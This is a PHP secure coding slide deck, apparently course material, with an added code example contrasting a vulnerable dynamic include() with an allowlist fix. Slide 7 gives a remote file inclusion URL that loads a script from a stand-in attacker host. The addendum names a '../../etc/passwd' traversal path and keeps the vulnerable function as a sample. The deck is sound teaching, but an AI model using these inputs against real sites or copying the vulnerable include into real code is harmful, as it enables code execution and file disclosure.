PHP Secure Coding - PowerPoint PPT Presentation

About This Presentation
Title: PHP Secure Coding

Slides: 9
Provided by: capi7

Transcript and Presenter's Notes

Slide 1
PHP Secure Coding
  • Do not trust user input or any other input
  • If you expect a number, typecast to a number by
    adding 0 to it
  • // $age should be a number
  • $age = $age + 0;

Slide 2
PHP Secure Coding
  • Do not trust user input or any other input
  • If you expect a string that will be part of an
    SQL query, escape the ' and \ characters
  • // $city should be a string free of SQL injected
    code
  • $city = mysql_real_escape_string($city);

Slide 3
PHP Secure Coding
  • Do not leave your directories exposed
  • Not having an index file in your directory will
    expose all your files in that directory
  • Set appropriate permissions for all your files
  • Do not give more permissions than you need

Slide 4
PHP Secure Coding
  • Even with an index file in each directory, you
    are still vulnerable to an attacker guessing the
    names of your files
  • Example: an attacker may try to go directly to
  • www.yahoo.com/www/Constants.inc
  • Do not choose easy-to-guess directory or file
    names

Slide 5
PHP Secure Coding
  • Do not leave a file exposed with an extension
    that makes it a text file or an HTML file
  • DatabaseConstants.inc -> will be entirely visible
    in the web browser if accessed directly by the
    attacker with the correct URL
  • Instead, use the .php extension -> if there is no
    echo statement, there is no output -> nothing in
    the browser

Slide 6
PHP Secure Coding
  • Be aware of using dynamically generated include
    statements such as
  • $page = $_GET['page'];
  • include("$page.php");
  • The above code uses (user) input to decide which
    PHP code is included and run; that code may end
    up not being yours

Slide 7
PHP Secure Coding
  • If the attacker enters in the URL box
  • http://leda.capitol-college.edu/hfranceschi/ct366
    /php/include/vulnerableHeader.php?page=http://www.
    hacker.com/attackerScript
  • The file included will be
  • http://www.hacker.com/attackerScript.php

Slide 8
PHP Secure Coding
  • Your web server can protect against opening files
    that come from a different URL by setting the
    configuration file appropriately
  • Also, the attacker could run a script that is
    local to your server
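The dynamic include from slides 6 to 8 and the "add 0" typecast from slide 1, shown as an added PHP example that is not part of the original slides; the page names, the pages/ directory and the age range are assumptions made for the illustration.

```php
<?php
// Added example, not from the slides. Vulnerable include (slide 6) beside a
// hardened version, plus a stricter replacement for "$age = $age + 0".

// Vulnerable: $page comes straight from the query string. If the php.ini
// directive allow_url_include is on (the "configuration file" of slide 8),
// ?page=http://www.hacker.com/attackerScript pulls in a remote script
// (slide 7); even with it off, a path such as ../../etc/passwd still reaches
// include() and runs or discloses a file that is local to the server.
function vulnerableHeader(array $get): void
{
    $page = $get['page'];
    include("$page.php");
}

// Hardened: the request only selects a name from a fixed allowlist, and the
// directory is pinned with __DIR__, so neither a URL nor a "../" path is ever
// passed to include(). Unknown names fall back to a default page.
function safeHeader(array $get): void
{
    $allowed = ['home', 'about', 'contact'];   // hypothetical page names
    $page    = $get['page'] ?? 'home';
    if (!in_array($page, $allowed, true)) {
        $page = 'home';
    }
    include __DIR__ . '/pages/' . $page . '.php';   // assumed layout
}

// Slide 1 says "typecast to a number by adding 0". filter_var is stricter:
// "$age + 0" still accepts a leading-numeric string such as "12abc" as 12,
// whereas FILTER_VALIDATE_INT rejects anything that is not a whole number.
function readAge(array $get): ?int
{
    $age = filter_var(
        $get['age'] ?? '',
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 150]]   // assumed bounds
    );
    return $age === false ? null : $age;   // null means "invalid, do not use"
}

// Constructed sample requests for a quick manual check.
var_dump(readAge(['age' => '42']));     // int(42)
var_dump(readAge(['age' => '12abc']));  // NULL
var_dump(readAge(['age' => '-3']));     // NULL
```

mysql_real_escape_string() from slide 2 belongs to the mysql extension, which was removed in PHP 7; on current PHP the equivalent advice is mysqli_real_escape_string() or, better, a prepared statement via mysqli or PDO so the value never becomes part of the SQL text.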